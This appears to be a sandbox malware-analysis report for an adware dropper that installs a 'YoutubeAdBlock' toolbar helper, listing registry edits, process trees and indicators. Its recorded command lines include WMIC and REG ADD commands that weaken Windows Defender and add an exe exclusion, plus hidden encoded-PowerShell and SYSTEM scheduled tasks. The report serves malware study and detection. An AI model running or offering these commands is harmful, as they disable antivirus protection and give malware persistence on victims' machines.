Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\ = "muVCVUSRFKgBfVwebaH[()(_mNyf{gjxSdMF"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	ZNIZXhj.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeZNIZXhj.exe

pid	process
184	powershell.exe
184	powershell.exe
184	powershell.exe
2116	powershell.exe
2116	powershell.exe
2116	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
2544	powershell.EXE
2544	powershell.EXE
2544	powershell.EXE
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
1040	powershell.exe
1040	powershell.exe
1040	powershell.exe
2576	powershell.exe
2576	powershell.exe
2576	powershell.exe
1272	powershell.exe
1272	powershell.exe
1272	powershell.exe
2992	powershell.exe
2992	powershell.exe
2992	powershell.exe
628	powershell.EXE
628	powershell.EXE
628	powershell.EXE
2944	powershell.exe
2944	powershell.exe
2944	powershell.exe
3492	powershell.exe
3492	powershell.exe
3492	powershell.exe
4020	powershell.exe
4020	powershell.exe
4020	powershell.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe
756	ZNIZXhj.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	184	powershell.exe
Token: SeIncreaseQuotaPrivilege	2032	WMIC.exe
Token: SeSecurityPrivilege	2032	WMIC.exe
Token: SeTakeOwnershipPrivilege	2032	WMIC.exe
Token: SeLoadDriverPrivilege	2032	WMIC.exe
Token: SeSystemProfilePrivilege	2032	WMIC.exe
Token: SeSystemtimePrivilege	2032	WMIC.exe
Token: SeProfSingleProcessPrivilege	2032	WMIC.exe
Token: SeIncBasePriorityPrivilege	2032	WMIC.exe
Token: SeCreatePagefilePrivilege	2032	WMIC.exe
Token: SeBackupPrivilege	2032	WMIC.exe
Token: SeRestorePrivilege	2032	WMIC.exe
Token: SeShutdownPrivilege	2032	WMIC.exe
Token: SeDebugPrivilege	2032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2032	WMIC.exe
Token: SeRemoteShutdownPrivilege	2032	WMIC.exe
Token: SeUndockPrivilege	2032	WMIC.exe
Token: SeManageVolumePrivilege	2032	WMIC.exe
Token: 33	2032	WMIC.exe
Token: 34	2032	WMIC.exe
Token: 35	2032	WMIC.exe
Token: 36	2032	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2032	WMIC.exe
Token: SeSecurityPrivilege	2032	WMIC.exe
Token: SeTakeOwnershipPrivilege	2032	WMIC.exe
Token: SeLoadDriverPrivilege	2032	WMIC.exe
Token: SeSystemProfilePrivilege	2032	WMIC.exe
Token: SeSystemtimePrivilege	2032	WMIC.exe
Token: SeProfSingleProcessPrivilege	2032	WMIC.exe
Token: SeIncBasePriorityPrivilege	2032	WMIC.exe
Token: SeCreatePagefilePrivilege	2032	WMIC.exe
Token: SeBackupPrivilege	2032	WMIC.exe
Token: SeRestorePrivilege	2032	WMIC.exe
Token: SeShutdownPrivilege	2032	WMIC.exe
Token: SeDebugPrivilege	2032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2032	WMIC.exe
Token: SeRemoteShutdownPrivilege	2032	WMIC.exe
Token: SeUndockPrivilege	2032	WMIC.exe
Token: SeManageVolumePrivilege	2032	WMIC.exe
Token: 33	2032	WMIC.exe
Token: 34	2032	WMIC.exe
Token: 35	2032	WMIC.exe
Token: 36	2032	WMIC.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeIncreaseQuotaPrivilege	192	WMIC.exe
Token: SeSecurityPrivilege	192	WMIC.exe
Token: SeTakeOwnershipPrivilege	192	WMIC.exe
Token: SeLoadDriverPrivilege	192	WMIC.exe
Token: SeSystemProfilePrivilege	192	WMIC.exe
Token: SeSystemtimePrivilege	192	WMIC.exe
Token: SeProfSingleProcessPrivilege	192	WMIC.exe
Token: SeIncBasePriorityPrivilege	192	WMIC.exe
Token: SeCreatePagefilePrivilege	192	WMIC.exe
Token: SeBackupPrivilege	192	WMIC.exe
Token: SeRestorePrivilege	192	WMIC.exe
Token: SeShutdownPrivilege	192	WMIC.exe
Token: SeDebugPrivilege	192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	192	WMIC.exe
Token: SeRemoteShutdownPrivilege	192	WMIC.exe
Token: SeUndockPrivilege	192	WMIC.exe
Token: SeManageVolumePrivilege	192	WMIC.exe
Token: 33	192	WMIC.exe
Token: 34	192	WMIC.exe
Token: 35	192	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5bda03599e20fd2226c14ad3f22a518b.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exepowershell.EXE

description	pid	process	target process
PID 3100 wrote to memory of 916	3100	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 3100 wrote to memory of 916	3100	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 3100 wrote to memory of 916	3100	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 916 wrote to memory of 1664	916	SimplInst.exe	SimplInst.exe
PID 916 wrote to memory of 1664	916	SimplInst.exe	SimplInst.exe
PID 916 wrote to memory of 1664	916	SimplInst.exe	SimplInst.exe
PID 1664 wrote to memory of 3164	1664	SimplInst.exe	cmd.exe
PID 1664 wrote to memory of 3164	1664	SimplInst.exe	cmd.exe
PID 1664 wrote to memory of 3164	1664	SimplInst.exe	cmd.exe
PID 3164 wrote to memory of 2684	3164	cmd.exe	forfiles.exe
PID 3164 wrote to memory of 2684	3164	cmd.exe	forfiles.exe
PID 3164 wrote to memory of 2684	3164	cmd.exe	forfiles.exe
PID 2684 wrote to memory of 200	2684	forfiles.exe	cmd.exe
PID 2684 wrote to memory of 200	2684	forfiles.exe	cmd.exe
PID 2684 wrote to memory of 200	2684	forfiles.exe	cmd.exe
PID 200 wrote to memory of 184	200	cmd.exe	powershell.exe
PID 200 wrote to memory of 184	200	cmd.exe	powershell.exe
PID 200 wrote to memory of 184	200	cmd.exe	powershell.exe
PID 184 wrote to memory of 2032	184	powershell.exe	WMIC.exe
PID 184 wrote to memory of 2032	184	powershell.exe	WMIC.exe
PID 184 wrote to memory of 2032	184	powershell.exe	WMIC.exe
PID 1664 wrote to memory of 3924	1664	SimplInst.exe	forfiles.exe
PID 1664 wrote to memory of 3924	1664	SimplInst.exe	forfiles.exe
PID 1664 wrote to memory of 3924	1664	SimplInst.exe	forfiles.exe
PID 3924 wrote to memory of 2664	3924	forfiles.exe	cmd.exe
PID 3924 wrote to memory of 2664	3924	forfiles.exe	cmd.exe
PID 3924 wrote to memory of 2664	3924	forfiles.exe	cmd.exe
PID 2664 wrote to memory of 1692	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 1692	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 1692	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 3484	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 3484	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 3484	2664	cmd.exe	reg.exe
PID 3164 wrote to memory of 2836	3164	cmd.exe	forfiles.exe
PID 3164 wrote to memory of 2836	3164	cmd.exe	forfiles.exe
PID 3164 wrote to memory of 2836	3164	cmd.exe	forfiles.exe
PID 2836 wrote to memory of 3564	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 3564	2836	forfiles.exe	cmd.exe
PID 2836 wrote to memory of 3564	2836	forfiles.exe	cmd.exe
PID 3564 wrote to memory of 2116	3564	cmd.exe	powershell.exe
PID 3564 wrote to memory of 2116	3564	cmd.exe	powershell.exe
PID 3564 wrote to memory of 2116	3564	cmd.exe	powershell.exe
PID 2116 wrote to memory of 192	2116	powershell.exe	WMIC.exe
PID 2116 wrote to memory of 192	2116	powershell.exe	WMIC.exe
PID 2116 wrote to memory of 192	2116	powershell.exe	WMIC.exe
PID 3164 wrote to memory of 2688	3164	cmd.exe	forfiles.exe
PID 3164 wrote to memory of 2688	3164	cmd.exe	forfiles.exe
PID 3164 wrote to memory of 2688	3164	cmd.exe	forfiles.exe
PID 2688 wrote to memory of 3912	2688	forfiles.exe	cmd.exe
PID 2688 wrote to memory of 3912	2688	forfiles.exe	cmd.exe
PID 2688 wrote to memory of 3912	2688	forfiles.exe	cmd.exe
PID 3912 wrote to memory of 3200	3912	cmd.exe	powershell.exe
PID 3912 wrote to memory of 3200	3912	cmd.exe	powershell.exe
PID 3912 wrote to memory of 3200	3912	cmd.exe	powershell.exe
PID 3200 wrote to memory of 184	3200	powershell.exe	WMIC.exe
PID 3200 wrote to memory of 184	3200	powershell.exe	WMIC.exe
PID 3200 wrote to memory of 184	3200	powershell.exe	WMIC.exe
PID 1664 wrote to memory of 2652	1664	SimplInst.exe	schtasks.exe
PID 1664 wrote to memory of 2652	1664	SimplInst.exe	schtasks.exe
PID 1664 wrote to memory of 2652	1664	SimplInst.exe	schtasks.exe
PID 1664 wrote to memory of 2676	1664	SimplInst.exe	schtasks.exe
PID 1664 wrote to memory of 2676	1664	SimplInst.exe	schtasks.exe
PID 1664 wrote to memory of 2676	1664	SimplInst.exe	schtasks.exe
PID 2544 wrote to memory of 2504	2544	powershell.EXE	gpupdate.exe

C:\Users\Admin\AppData\Local\Temp\5bda03599e20fd2226c14ad3f22a518b.exe
"C:\Users\Admin\AppData\Local\Temp\5bda03599e20fd2226c14ad3f22a518b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3100

C:\Users\Admin\AppData\Local\Temp\7zS163D.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:916

C:\Users\Admin\AppData\Local\Temp\7zS16F8.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:184

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3200

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:184

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:2664

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1692

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:3484

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPJwsyVrV" /SC once /ST 00:16:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:2652

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPJwsyVrV"
4⤵
PID:2676

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPJwsyVrV"
4⤵
PID:3916

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 07:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\PIBpJDt.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3924

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2576

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1676

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\PIBpJDt.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\PIBpJDt.exe nv /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:3552

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3256

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2104

C:\Windows\SysWOW64\forfiles.exe
